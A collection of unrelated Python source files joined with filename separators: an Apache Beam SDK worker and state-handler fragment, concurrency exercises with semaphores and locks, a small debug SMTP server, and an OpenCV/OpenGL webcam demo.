``beam_fn_api_pb2.ProcessBundleDescriptor``.
Attributes:
fns (dict): A dictionary that maps bundle descriptor IDs to instances of
``beam_fn_api_pb2.ProcessBundleDescriptor``.
state_handler_factory (``StateHandlerFactory``): Used to create state
handlers to be used by a ``bundle_processor.BundleProcessor`` during
processing.
data_channel_factory (``data_plane.DataChannelFactory``)
active_bundle_processors (dict): A dictionary, indexed by instruction IDs,
containing ``bundle_processor.BundleProcessor`` objects that are currently
active processing the corresponding instruction.
cached_bundle_processors (dict): A dictionary, indexed by bundle processor
id, of cached ``bundle_processor.BundleProcessor`` that are not currently
performing processing.
"""
def __init__(self,
state_handler_factory, # type: StateHandlerFactory
data_channel_factory, # type: data_plane.DataChannelFactory
fns # type: Mapping[str, beam_fn_api_pb2.ProcessBundleDescriptor]
):
self.fns = fns
self.state_handler_factory = state_handler_factory
self.data_channel_factory = data_channel_factory
self.active_bundle_processors = {
} # type: Dict[str, Tuple[str, bundle_processor.BundleProcessor]]
self.cached_bundle_processors = collections.defaultdict(
list) # type: DefaultDict[str, List[bundle_processor.BundleProcessor]]
self.last_access_times = collections.defaultdict(
float) # type: DefaultDict[str, float]
self._schedule_periodic_shutdown()
def register(self, bundle_descriptor):
# type: (beam_fn_api_pb2.ProcessBundleDescriptor) -> None
"""Register a ``beam_fn_api_pb2.ProcessBundleDescriptor`` by its id."""
self.fns[bundle_descriptor.id] = bundle_descriptor
def get(self, instruction_id, bundle_descriptor_id):
# type: (str, str) -> bundle_processor.BundleProcessor
"""
Return the requested ``BundleProcessor``, creating it if necessary.
Moves the ``BundleProcessor`` from the inactive to the active cache.
"""
try:
# pop() is threadsafe
processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
except IndexError:
processor = bundle_processor.BundleProcessor(
self.fns[bundle_descriptor_id],
self.state_handler_factory.create_state_handler(
self.fns[bundle_descriptor_id].state_api_service_descriptor),
self.data_channel_factory)
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
return processor
def lookup(self, instruction_id):
# type: (str) -> Optional[bundle_processor.BundleProcessor]
"""
Return the requested ``BundleProcessor`` from the cache.
"""
return self.active_bundle_processors.get(instruction_id, (None, None))[-1]
def discard(self, instruction_id):
# type: (str) -> None
"""
Remove the ``BundleProcessor`` from the cache.
"""
self.active_bundle_processors[instruction_id][1].shutdown()
del self.active_bundle_processors[instruction_id]
def release(self, instruction_id):
# type: (str) -> None
"""
Release the requested ``BundleProcessor``.
Resets the ``BundleProcessor`` and moves it from the active to the
inactive cache.
"""
descriptor_id, processor = self.active_bundle_processors.pop(instruction_id)
processor.reset()
self.last_access_times[descriptor_id] = time.time()
self.cached_bundle_processors[descriptor_id].append(processor)
def shutdown(self):
"""
Shutdown all ``BundleProcessor``s in the cache.
"""
if self.periodic_shutdown:
self.periodic_shutdown.cancel()
self.periodic_shutdown.join()
self.periodic_shutdown = None
for instruction_id in self.active_bundle_processors:
self.active_bundle_processors[instruction_id][1].shutdown()
del self.active_bundle_processors[instruction_id]
for cached_bundle_processors in self.cached_bundle_processors.values():
BundleProcessorCache._shutdown_cached_bundle_processors(
cached_bundle_processors)
def _schedule_periodic_shutdown(self):
def shutdown_inactive_bundle_processors():
for descriptor_id, last_access_time in self.last_access_times.items():
if (time.time() - last_access_time >
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S):
BundleProcessorCache._shutdown_cached_bundle_processors(
self.cached_bundle_processors[descriptor_id])
self.periodic_shutdown = PeriodicThread(
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S,
shutdown_inactive_bundle_processors)
self.periodic_shutdown.daemon = True
self.periodic_shutdown.start()
@staticmethod
def _shutdown_cached_bundle_processors(cached_bundle_processors):
try:
while True:
# pop() is threadsafe
bundle_processor = cached_bundle_processors.pop()
bundle_processor.shutdown()
except IndexError:
pass
class SdkWorker(object):
def __init__(self,
bundle_processor_cache, # type: BundleProcessorCache
state_cache_metrics_fn=list,
profiler_factory=None, # type: Optional[Callable[..., Profile]]
log_lull_timeout_ns=None,
):
self.bundle_processor_cache = bundle_processor_cache
self.state_cache_metrics_fn = state_cache_metrics_fn
self.profiler_factory = profiler_factory
self.log_lull_timeout_ns = (
log_lull_timeout_ns or DEFAULT_LOG_LULL_TIMEOUT_NS)
self._last_full_thread_dump_secs = 0
def do_instruction(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> beam_fn_api_pb2.InstructionResponse
request_type = request.WhichOneof('request')
if request_type:
# E.g. if register is set, this will call self.register(request.register))
return getattr(self, request_type)(
getattr(request, request_type), request.instruction_id)
else:
raise NotImplementedError
def register(self,
request, # type: beam_fn_api_pb2.RegisterRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
"""Registers a set of ``beam_fn_api_pb2.ProcessBundleDescriptor``s.
This set of ``beam_fn_api_pb2.ProcessBundleDescriptor`` come as part of a
``beam_fn_api_pb2.RegisterRequest``, which the runner sends to the SDK
worker before starting processing to register stages.
"""
for process_bundle_descriptor in request.process_bundle_descriptor:
self.bundle_processor_cache.register(process_bundle_descriptor)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
def process_bundle(self,
request, # type: beam_fn_api_pb2.ProcessBundleRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
bundle_processor = self.bundle_processor_cache.get(
instruction_id, request.process_bundle_descriptor_id)
try:
with bundle_processor.state_handler.process_instruction_id(
instruction_id, request.cache_tokens):
with self.maybe_profile(instruction_id):
delayed_applications, requests_finalization = (
bundle_processor.process_bundle(instruction_id))
monitoring_infos = bundle_processor.monitoring_infos()
monitoring_infos.extend(self.state_cache_metrics_fn())
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
residual_roots=delayed_applications,
monitoring_infos=monitoring_infos,
monitoring_data={
SHORT_ID_CACHE.getShortId(info): info.payload
for info in monitoring_infos
},
requires_finalization=requests_finalization))
# Don't release here if finalize is needed.
if not requests_finalization:
self.bundle_processor_cache.release(instruction_id)
return response
except: # pylint: disable=broad-except
# Don't re-use bundle processors on failure.
self.bundle_processor_cache.discard(instruction_id)
raise
def process_bundle_split(self,
request, # type: beam_fn_api_pb2.ProcessBundleSplitRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
processor = self.bundle_processor_cache.lookup(request.instruction_id)
if processor:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_split=processor.try_split(request))
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
def _log_lull_in_bundle_processor(self, processor):
sampler_info = processor.state_sampler.get_info()
self._log_lull_sampler_info(sampler_info)
def _log_lull_sampler_info(self, sampler_info):
if (sampler_info and sampler_info.time_since_transition and
sampler_info.time_since_transition > self.log_lull_timeout_ns):
step_name = sampler_info.state_name.step_name
state_name = sampler_info.state_name.name
lull_seconds = sampler_info.time_since_transition / 1e9
state_lull_log = (
'Operation ongoing for over %.2f seconds in state %s' %
(lull_seconds, state_name))
step_name_log = (' in step %s ' % step_name) if step_name else ''
exec_thread = getattr(sampler_info, 'tracked_thread', None)
if exec_thread is not None:
thread_frame = sys._current_frames().get(exec_thread.ident) # pylint: disable=protected-access
stack_trace = '\n'.join(
traceback.format_stack(thread_frame)) if thread_frame else ''
else:
stack_trace = '-NOT AVAILABLE-'
_LOGGER.warning(
'%s%s without returning. Current Traceback:\n%s',
state_lull_log,
step_name_log,
stack_trace)
if self._should_log_full_thread_dump(lull_seconds):
self._log_full_thread_dump()
def _should_log_full_thread_dump(self, lull_seconds):
if lull_seconds < LOG_LULL_FULL_THREAD_DUMP_LULL_S:
return False
now = time.time()
if (self._last_full_thread_dump_secs + LOG_LULL_FULL_THREAD_DUMP_INTERVAL_S
< now):
self._last_full_thread_dump_secs = now
return True
return False
def _log_full_thread_dump(self):
thread_dump()
def process_bundle_progress(self,
request, # type: beam_fn_api_pb2.ProcessBundleProgressRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
# It is an error to get progress for a not-in-flight bundle.
processor = self.bundle_processor_cache.lookup(request.instruction_id)
if processor:
self._log_lull_in_bundle_processor(processor)
monitoring_infos = processor.monitoring_infos() if processor else []
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
monitoring_infos=monitoring_infos,
monitoring_data={
SHORT_ID_CACHE.getShortId(info): info.payload
for info in monitoring_infos
}))
def process_bundle_progress_metadata_request(self,
request, # type: beam_fn_api_pb2.ProcessBundleProgressMetadataRequest
instruction_id # type: str
):
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.
ProcessBundleProgressMetadataResponse(
monitoring_info=SHORT_ID_CACHE.getInfos(
request.monitoring_info_id)))
def finalize_bundle(self,
request, # type: beam_fn_api_pb2.FinalizeBundleRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
processor = self.bundle_processor_cache.lookup(request.instruction_id)
if processor:
try:
finalize_response = processor.finalize_bundle()
self.bundle_processor_cache.release(request.instruction_id)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, finalize_bundle=finalize_response)
except:
self.bundle_processor_cache.discard(request.instruction_id)
raise
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
@contextlib.contextmanager
def maybe_profile(self, instruction_id):
if self.profiler_factory:
profiler = self.profiler_factory(instruction_id)
if profiler:
with profiler:
yield
else:
yield
else:
yield
class StateHandler(with_metaclass(abc.ABCMeta, object)): # type: ignore[misc]
"""An abstract object representing a ``StateHandler``."""
@abc.abstractmethod
def get_raw(self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
raise NotImplementedError(type(self))
@abc.abstractmethod
def append_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
data # type: bytes
):
# type: (...) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
raise NotImplementedError(type(self))
class StateHandlerFactory(with_metaclass(abc.ABCMeta,
object)): # type: ignore[misc]
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> CachingStateHandler
"""Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
# type: () -> None
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
"""A factory for ``GrpcStateHandler``.
Caches the created channels by ``state descriptor url``.
"""
def __init__(self, state_cache, credentials=None):
self._state_handler_cache = {} # type: Dict[str, CachingStateHandler]
self._lock = threading.Lock()
self._throwing_state_handler = ThrowingStateHandler()
self._credentials = credentials
self._state_cache = state_cache
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> CachingStateHandler
if not api_service_descriptor:
return self._throwing_state_handler
url = api_service_descriptor.url
if url not in self._state_handler_cache:
with self._lock:
if url not in self._state_handler_cache:
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if self._credentials is None:
_LOGGER.info('Creating insecure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=options)
else:
_LOGGER.info('Creating secure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=options)
_LOGGER.info('State channel established.')
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(
grpc_channel, WorkerIdInterceptor())
self._state_handler_cache[url] = CachingStateHandler(
self._state_cache,
GrpcStateHandler(
beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel)))
return self._state_handler_cache[url]
def close(self):
# type: () -> None
_LOGGER.info('Closing all cached gRPC state handlers.')
for _, state_handler in self._state_handler_cache.items():
state_handler.done()
self._state_handler_cache.clear()
self._state_cache.evict_all()
class ThrowingStateHandler(StateHandler):
"""A state handler that errors on any requests."""
def get_raw(self, state_key, coder):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
def append_raw(self, state_key, coder, elements):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
def clear(self, state_key):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
class GrpcStateHandler(StateHandler):
_DONE = object()
def __init__(self, state_stub):
# type: (beam_fn_api_pb2_grpc.BeamFnStateStub) -> None
self._lock = threading.Lock()
self._state_stub = state_stub
self._requests = queue.Queue(
) # type: queue.Queue[beam_fn_api_pb2.StateRequest]
self._responses_by_id = {} # type: Dict[str, _Future]
self._last_id = 0
self._exc_info = None
self._context = threading.local()
self.start()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
if getattr(self._context, 'process_instruction_id', None) is not None:
raise RuntimeError(
'Already bound to %r' % self._context.process_instruction_id)
self._context.process_instruction_id = bundle_id
try:
yield
finally:
self._context.process_instruction_id = None
def start(self):
self._done = False
def request_iter():
while True:
request = self._requests.get()
if request is self._DONE or self._done:
break
yield request
responses = self._state_stub.State(request_iter())
def pull_responses():
try:
for response in responses:
# Popping an item from a dictionary is atomic in cPython
future = self._responses_by_id.pop(response.id)
future.set(response)
if self._done:
break
except: # pylint: disable=bare-except
self._exc_info = sys.exc_info()
raise
reader = threading.Thread(target=pull_responses, name='read_state')
reader.daemon = True
reader.start()
def done(self):
self._done = True
self._requests.put(self._DONE)
def get_raw(self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
response = self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
get=beam_fn_api_pb2.StateGetRequest(
continuation_token=continuation_token)))
return response.get.data, response.get.continuation_token
def append_raw(self,
state_key, # type: Optional[beam_fn_api_pb2.StateKey]
data # type: bytes
):
# type: (...) -> _Future
return self._request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
append=beam_fn_api_pb2.StateAppendRequest(data=data)))
def clear(self, state_key):
# type: (Optional[beam_fn_api_pb2.StateKey]) -> _Future
return self._request(
beam_fn_api_pb2.StateRequest(
state_key=state_key, clear=beam_fn_api_pb2.StateClearRequest()))
def _request(self, request):
# type: (beam_fn_api_pb2.StateRequest) -> _Future
request.id = self._next_id()
request.instruction_id = self._context.process_instruction_id
# Adding a new item to a dictionary is atomic in cPython
self._responses_by_id[request.id] = future = _Future()
# Request queue is thread-safe
self._requests.put(request)
return future
def _blocking_request(self, request):
# type: (beam_fn_api_pb2.StateRequest) -> beam_fn_api_pb2.StateResponse
req_future = self._request(request)
while not req_future.wait(timeout=1):
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
elif self._done:
raise RuntimeError()
response = req_future.get()
if response.error:
raise RuntimeError(response.error)
else:
return response
def _next_id(self):
# type: () -> str
with self._lock:
# Use a lock here because this GrpcStateHandler is shared across all
# requests which have the same process bundle descriptor. State requests
# can concurrently access this section if a Runner uses threads / workers
# (aka "parallelism") to send data to this SdkHarness and its workers.
self._last_id += 1
request_id = self._last_id
return str(request_id)
class CachingStateHandler(object):
""" A State handler which retrieves and caches state.
If caching is activated, caches across bundles using a supplied cache token.
If activated but no cache token is supplied, caching is done at the bundle
level.
"""
def __init__(self,
global_state_cache, # type: StateCache
underlying_state # type: StateHandler
):
self._underlying = underlying_state
self._state_cache = global_state_cache
self._context = threading.local()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id, cache_tokens):
if getattr(self._context, 'user_state_cache_token', None) is not None:
raise RuntimeError(
'Cache tokens already set to %s' %
self._context.user_state_cache_token)
self._context.side_input_cache_tokens = {}
user_state_cache_token = None
for cache_token_struct in cache_tokens:
if cache_token_struct.HasField("user_state"):
# There should only be one user state token present
assert not user_state_cache_token
user_state_cache_token = cache_token_struct.token
elif cache_token_struct.HasField("side_input"):
self._context.side_input_cache_tokens[
cache_token_struct.side_input.transform_id,
cache_token_struct.side_input.
side_input_id] = cache_token_struct.token
# TODO: Consider a two-level cache to avoid extra logic and locking
# for items cached at the bundle level.
self._context.bundle_cache_token = bundle_id
try:
self._state_cache.initialize_metrics()
self._context.user_state_cache_token = user_state_cache_token
with self._underlying.process_instruction_id(bundle_id):
yield
finally:
self._context.side_input_cache_tokens = {}
self._context.user_state_cache_token = None
self._context.bundle_cache_token = None
def blocking_get(self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
cache_token = self._get_cache_token(state_key)
if not cache_token:
# Cache disabled / no cache token. Can't do a lookup/store in the cache.
# Fall back to lazily materializing the state, one element at a time.
return self._lazy_iterator(state_key, coder)
# Cache lookup
cache_state_key = self._convert_to_cache_key(state_key)
cached_value = self._state_cache.get(cache_state_key, cache_token)
if cached_value is None:
# Cache miss, need to retrieve from the Runner
# Further size estimation or the use of the continuation token on the
# runner side could fall back to materializing one item at a time.
# https://jira.apache.org/jira/browse/BEAM-8297
materialized = cached_value = (
self._partially_cached_iterable(state_key, coder))
if isinstance(materialized, (list, self.ContinuationIterable)):
self._state_cache.put(cache_state_key, cache_token, materialized)
else:
_LOGGER.error(
"Uncacheable type %s for key %s. Not caching.",
materialized,
state_key)
return cached_value
def extend(self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
elements, # type: Iterable[Any]
):
# type: (...) -> _Future
cache_token = self._get_cache_token(state_key)
if cache_token:
# Update the cache
cache_key = self._convert_to_cache_key(state_key)
cached_value = self._state_cache.get(cache_key, cache_token)
# Keep in mind that the state for this key can be evicted
# while executing this function. Either read or write to the cache
# but never do both here!
if cached_value is None:
# We have never cached this key before, first retrieve state
cached_value = self.blocking_get(state_key, coder)
# Just extend the already cached value
if isinstance(cached_value, list):
# Materialize provided iterable to ensure reproducible iterations,
# here and when writing to the state handler below.
elements = list(elements)
# The state is fully cached and can be extended
cached_value.extend(elements)
elif isinstance(cached_value, self.ContinuationIterable):
# The state is too large to be fully cached (continuation token used),
# only the first part is cached, the rest if enumerated via the runner.
pass
else:
# When a corrupt value made it into the cache, we have to fail.
raise Exception("Unexpected cached value: %s" % cached_value)
# Write to state handler
out = coder_impl.create_OutputStream()
for element in elements:
coder.encode_to_stream(element, out, True)
return self._underlying.append_raw(state_key, out.get())
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
cache_token = self._get_cache_token(state_key)
if cache_token:
cache_key = self._convert_to_cache_key(state_key)
self._state_cache.clear(cache_key, cache_token)
return self._underlying.clear(state_key)
def done(self):
# type: () -> None
self._underlying.done()
def _lazy_iterator(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Iterator[Any]
"""Materializes the state lazily, one element at a time.
:return A generator which returns the next element if advanced.
"""
while True:
data, continuation_token = (
self._underlying.get_raw(state_key, continuation_token))
input_stream = coder_impl.create_InputStream(data)
while input_stream.size() > 0:
yield coder.decode_from_stream(input_stream, True)
if not continuation_token:
break
def _get_cache_token(self, state_key):
if not self._state_cache.is_cache_enabled():
return None
elif state_key.HasField('bag_user_state'):
if self._context.user_state_cache_token:
return self._context.user_state_cache_token
else:
return self._context.bundle_cache_token
elif state_key.WhichOneof('type').endswith('_side_input'):
side_input = getattr(state_key, state_key.WhichOneof('type'))
return self._context.side_input_cache_tokens.get(
(side_input.transform_id, side_input.side_input_id),
self._context.bundle_cache_token)
def _partially_cached_iterable(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
"""Materialized the first page of data, concatenated with a lazy iterable
of the rest, if any.
"""
data, continuation_token = self._underlying.get_raw(state_key, None)
head = []
input_stream = coder_impl.create_InputStream(data)
while input_stream.size() > 0:
head.append(coder.decode_from_stream(input_stream, True))
if not continuation_token:
return head
else:
return self.ContinuationIterable(
head,
functools.partial(
self._lazy_iterator, state_key, coder, continuation_token))
class ContinuationIterable(object):
def __init__(self, head, continue_iterator_fn):
self.head = head
self.continue_iterator_fn = continue_iterator_fn
def __iter__(self):
for item in self.head:
yield item
for item in self.continue_iterator_fn():
yield item
@staticmethod
def _convert_to_cache_key(state_key):
return state_key.SerializeToString()
class _Future(object):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
self._event = threading.Event()
def wait(self, timeout=None):
return self._event.wait(timeout)
def get(self, timeout=None):
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
self._value = value
self._event.set()
@classmethod
def done(cls):
# type: () -> _Future
if not hasattr(cls, 'DONE'):
done_future = _Future()
done_future.set(None)
cls.DONE = done_future # type: ignore[attr-defined]
return cls.DONE # type: ignore[attr-defined]
class KeyedDefaultDict(collections.defaultdict):
def __missing__(self, key):
self[key] = self.default_factory(key)
return self[key]
|
dining_savages.py
|
from threading import Semaphore, Thread
from itertools import chain
def savage(servings, mutex, pot, empty_pot):
while True:
mutex.acquire()
pot.pot_count -= 1
if pot.pot_count <= 0:
empty_pot.release()
mutex.release()
pot.acquire()
serving = get_serving(servings)
eat(serving)
def cook(servings, mutex, empty_pot, pot):
while True:
empty_pot.acquire()
put_servings(servings, pot.total)
mutex.acquire()
pot.pot_count = pot.total
for _ in xrange(pot.pot_count):
pot.release()
mutex.release()
def get_serving(servings):
return servings.pop()
def put_servings(servings, total):
for food in range(total):
servings.append(food)
def eat(serving):
print 'Eating {}'.format(serving)
if __name__ == '__main__':
num_savages = 10
pot_count = 5
mutex = Semaphore(1)
empty_pot = Semaphore(0)
mutex = Semaphore(1)
pot = Semaphore(0)
pot.total = pot_count
pot.pot_count = 0
servings = []
savages = [Thread(target=savage, args=(servings, mutex, pot, empty_pot))
for _ in range(num_savages)]
cook = Thread(target=cook, args=(servings, mutex, empty_pot, pot))
for t in chain(savages, [cook]):
t.start()
for t in chain(savages, [cook]):
t.join()
|
smtp_server.py
|
# smtp_server.py
import smtpd
import asyncore
import threading
class CustomSMTPServer(smtpd.SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
print('Receiving message from:', peer)
print('Message addressed from:', mailfrom)
print('Message addressed to:', rcpttos)
print('Message length:', len(data))
return
class SMTPServer():
def __init__(self):
self.port = 1030
def start(self):
'''Start listening on self.port'''
# create an instance of the SMTP server, derived from asyncore.dispatcher
self.smtp = CustomSMTPServer(('0.0.0.0', self.port), None)
# start the asyncore loop, listening for SMTP connection, within a thread
# timeout parameter is important, otherwise code will block 30 seconds
# after the smtp channel has been closed
kwargs = {'timeout':1, 'use_poll': True}
self.thread = threading.Thread(target=asyncore.loop, kwargs=kwargs)
self.thread.start()
def stop(self):
'''Stop listening to self.port'''
# close the SMTPserver to ensure no channels connect to asyncore
self.smtp.close()
# now it is safe to wait for asyncore.loop() to exit
self.thread.join()
# check for emails in a non-blocking way
def get(self):
'''Return all emails received so far'''
return self.smtp.emails
if __name__ == '__main__':
# server = CustomSMTPServer(('0.0.0.0', 1030), None)
# asyncore.loop()
server = SMTPServer()
server.start()
|
h4.py
|
'''
现有两个进程,1号进程向文件写入10个"hello" 2号进程向文件写入10个"world",两个进程并发执行
如何使得文件中的内容一定是"hellohellohellohellohello.....worldworldworld......."
'''
from multiprocessing import Process,Lock
def new1write(name,mylock):
with mylock:
f = open(name,'r+')
f.write('hello'*10)
f.close()
def new2write(name,mylock):
with mylock:
f = open(name,'r+')
c = f.read()
f.seek(0,0)
f.write(c+'world'*10)
f.close()
if __name__ == '__main__':
f = open('./my.txt','w')
f.close()
mylock = Lock()
p1 = Process(target=new1write,args=('./my.txt',mylock))
p2 = Process(target=new2write,args=('./my.txt', mylock))
p1.start()
p2.start()
p1.join()
p2.join()
|
01- opencv-opengl.py
|
#coding:utf-8
'''
OpenCV与OpenGL结合使用
'''
import numpy as np
import cv2
from PIL import Image
import sys
from OpenGL.GL import *
from OpenGL.GLUT import *
from OpenGL.GLU import *
from threading import Thread
texture_id = 0
threadQuit = 0
X_AXIS = 0.0
Y_AXIS = 0.0
Z_AXIS = 0.0
DIRECTION = 1
cap = cv2.VideoCapture(0)
newframe = cap.read()[1]
#fps = cap.get(cv2.cv.CV_CAP_PROP_FPS)
def Init():
VideoThread = Thread(target=update, args=())
VideoThread.start()
#VideoThread.join()
def InitGL(Width, Height):
global texture_id
glClearColor(1.0, 1.0, 1.0, 1.0)
glClearDepth(1.0)
glDepthFunc(GL_LESS)
glEnable(GL_DEPTH_TEST)
glShadeModel(GL_SMOOTH)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(45.0, float(Width)/float(Height), 0.1, 100.0)
glMatrixMode(GL_MODELVIEW)
glEnable(GL_TEXTURE_2D)
texture_id = glGenTextures(1)
def update():
global newframe
while(True):
newframe = cap.read()[1]
newframe = cv2.cvtColor(newframe,cv2.COLOR_BGR2RGB)
if threadQuit == 1:
break
cap.release()
cv2.destroyAllWindows()
def DrawGLScene():
global cap
global newframe
global X_AXIS,Y_AXIS,Z_AXIS
global DIRECTION
global texture_id
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLoadIdentity()
frame = newframe
# convert image to OpenGL texture format
tx_image = cv2.flip(frame, 0)
tx_image = Image.fromarray(tx_image)
ix = tx_image.size[0]
iy = tx_image.size[1]
tx_image = tx_image.tobytes('raw', 'RGBX', 0, -1)
# create texture
glBindTexture(GL_TEXTURE_2D, texture_id)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, ix, iy, 0, GL_RGBA, GL_UNSIGNED_BYTE, tx_image)
glBindTexture(GL_TEXTURE_2D, texture_id)
glPushMatrix()
glTranslatef(0.0,0.0,-6.0)
glBegin(GL_QUADS)
glTexCoord2f(0.0, 1.0); glVertex3f(-4.0, -3.0, 0.0)
glTexCoord2f(1.0, 1.0); glVertex3f( 4.0, -3.0, 0.0)
glTexCoord2f(1.0, 0.0); glVertex3f( 4.0, 3.0, 0.0)
glTexCoord2f(0.0, 0.0); glVertex3f(-4.0, 3.0, 0.0)
glEnd()
glPopMatrix()
glPushMatrix()
glTranslatef(0.0,0.0,-6.0)
glRotatef(X_AXIS,1.0,0.0,0.0)
glRotatef(Y_AXIS,0.0,1.0,0.0)
glRotatef(Z_AXIS,0.0,0.0,1.0)
# Draw Cube (multiple quads)
glBegin(GL_QUADS)
glColor3f(0.0,1.0,0.0)
glVertex3f( 1.0, 1.0,-1.0)
glVertex3f(-1.0, 1.0,-1.0)
glVertex3f(-1.0, 1.0, 1.0)
glVertex3f( 1.0, 1.0, 1.0)
glColor3f(1.0,0.0,0.0)
glVertex3f( 1.0,-1.0, 1.0)
glVertex3f(-1.0,-1.0, 1.0)
glVertex3f(-1.0,-1.0,-1.0)
glVertex3f( 1.0,-1.0,-1.0)
glColor3f(0.0,1.0,1.0)
glVertex3f( 1.0, 1.0, 1.0)
glVertex3f(-1.0, 1.0, 1.0)
glVertex3f(-1.0,-1.0, 1.0)
glVertex3f( 1.0,-1.0, 1.0)
glColor3f(1.0,1.0,0.0)
glVertex3f( 1.0,-1.0,-1.0)
glVertex3f(-1.0,-1.0,-1.0)
glVertex3f(-1.0, 1.0,-1.0)
glVertex3f( 1.0, 1.0,-1.0)
glColor3f(0.0,0.0,1.0)
glVertex3f(-1.0, 1.0, 1.0)
glVertex3f(-1.0, 1.0,-1.0)
glVertex3f(-1.0,-1.0,-1.0)
glVertex3f(-1.0,-1.0, 1.0)
glColor3f(1.0,0.0,1.0)
glVertex3f( 1.0, 1.0,-1.0)
glVertex3f( 1.0, 1.0, 1.0)
glVertex3f( 1.0,-1.0, 1.0)
glVertex3f( 1.0,-1.0,-1.0)
glEnd()
glPopMatrix()
X_AXIS = X_AXIS - 0.30
Z_AXIS = Z_AXIS - 0.30
glutSwapBuffers()
def keyPressed(key, x, y):
global threadQuit
if key == chr(27) or key == "q":
threadQuit = 1
sys.exit()
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH)
glutInitWindowSize(640,480)
glutInitWindowPosition(200,200)
window = glutCreateWindow(b'My and Cube')
glutDisplayFunc(DrawGLScene)
glutIdleFunc(DrawGLScene)
glutKeyboardFunc(keyPressed)
InitGL(640, 480)
glutMainLoop()
Init()
main()
|
manager.py
|
#!/usr/bin/env python2.7
import os
import sys
import fcntl
import errno
import signal
import subprocess
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
